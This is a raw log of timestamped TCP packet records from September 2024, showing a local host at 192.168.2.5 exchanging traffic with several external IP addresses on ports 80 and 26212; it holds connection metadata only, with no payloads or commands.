Sep 27, 2024 04:21:07.429620028 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429630995 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429642916 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429672003 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429722071 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429733992 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429745913 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429757118 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429761887 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429770947 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429773092 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429794073 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429816008 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429819107 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429857969 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429858923 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429872036 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429884911 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429896116 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429917097 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429928064 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429964066 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429979086 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429991007 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430001020 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430003881 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430013895 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430016041 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430035114 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430047035 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430104017 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430115938 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430128098 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430140018 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430149078 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430150986 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430165052 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430171967 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430176973 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430198908 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430222034 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430258989 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430272102 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430283070 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430293083 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430301905 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430311918 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430318117 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430325985 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430346012 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430370092 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430416107 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430428028 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430438995 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430448055 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430458069 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430459023 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430470943 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430484056 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430515051 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430560112 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430572987 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430583954 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430597067 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430608034 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430632114 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430670977 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430681944 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430694103 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430704117 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430716038 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430741072 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430823088 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430834055 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430845022 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430855036 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430865049 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430870056 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430876970 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430887938 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430891037 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430907011 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430917025 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430918932 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430937052 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430960894 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.430963993 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.430977106 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431005001 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431027889 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431052923 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431066036 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431077957 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431092024 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431107044 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431123972 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431159973 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431171894 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431183100 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431195021 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431202888 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431206942 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431210995 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431233883 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431252956 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431318998 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431330919 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431346893 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431356907 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431360006 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431369066 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431377888 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431380987 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431394100 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431402922 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431413889 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431415081 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431426048 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431437016 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431446075 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431449890 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431476116 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431488991 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431597948 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431610107 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431619883 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431642056 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431654930 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431663036 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431794882 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431807995 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431826115 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431837082 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431835890 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431849003 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431850910 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431864023 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431864977 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431875944 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431880951 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431889057 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431900024 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431901932 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431911945 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431922913 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431929111 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431935072 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431940079 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431950092 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.431972027 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.431993961 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.432110071 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432121992 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432133913 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432145119 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432152033 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.432157040 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432163000 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.432172060 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432182074 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.432185888 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432197094 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432212114 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.432234049 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.432316065 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432328939 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432342052 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432353973 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432354927 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.432367086 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432379007 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432384014 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.432391882 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.432410955 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.432424068 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.439656019 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:07.445581913 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:07.445650101 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:07.454770088 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:07.460750103 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:07.480391026 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.480412006 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.480422020 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.480432987 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.480443954 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.480490923 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.480492115 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.480532885 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.480545044 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.480556965 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.480567932 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.480572939 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.480581999 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.480602980 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520123959 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520145893 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520159960 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520172119 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520174026 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520189047 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520212889 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520212889 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520231009 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520245075 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520253897 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520260096 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520272017 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520273924 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520292997 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520304918 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520324945 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520329952 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520344019 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520354986 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520366907 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520370960 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520379066 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520385981 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520417929 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520430088 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520481110 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520490885 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520510912 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520523071 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520534039 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520535946 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520546913 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520575047 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520575047 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520602942 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520647049 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520659924 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520670891 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520679951 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520693064 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520704985 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520706892 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520716906 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520719051 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520745993 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520764112 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520781040 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520792007 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520802975 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520818949 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520838022 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520852089 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520881891 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520894051 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520904064 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520915985 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.520926952 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520937920 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.520950079 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.521019936 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521030903 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521042109 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521054029 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521056890 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.521066904 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521078110 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521080971 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.521090031 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521112919 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.521126986 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.521130085 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521145105 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521172047 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521173954 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.521186113 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.521187067 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.521207094 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.521230936 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:08.107952118 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:08.140028000 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:08.144867897 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:08.271197081 CEST	49712	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:08.271539927 CEST	49715	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:08.276354074 CEST	80	49715	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:08.276447058 CEST	49715	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:08.276566982 CEST	49715	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:08.276622057 CEST	80	49712	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:08.276678085 CEST	49712	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:08.281282902 CEST	80	49715	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:08.333467007 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:08.380084991 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:08.998712063 CEST	80	49715	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:08.998809099 CEST	49715	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:09.258934975 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:09.263920069 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.263999939 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:09.264225006 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:09.269066095 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.983994007 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.984013081 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.984025955 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.984039068 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.984050035 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.984061003 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:09.984070063 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.984081984 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.984095097 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.984107018 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.984117985 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:09.984118938 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.984152079 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:09.984191895 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:09.988920927 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.988934040 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.988991022 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:09.988991022 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:09.989067078 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:09.989141941 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.108556032 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.108582020 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.108591080 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.108603001 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.108644962 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.108695984 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.108863115 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.108874083 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.108886003 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.108896971 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.108931065 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.108944893 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.109266996 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.109309912 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.109309912 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.109330893 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.109353065 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.109354973 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.109390974 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.109390974 CEST	49716	80	192.168.2.5	185.215.113.26
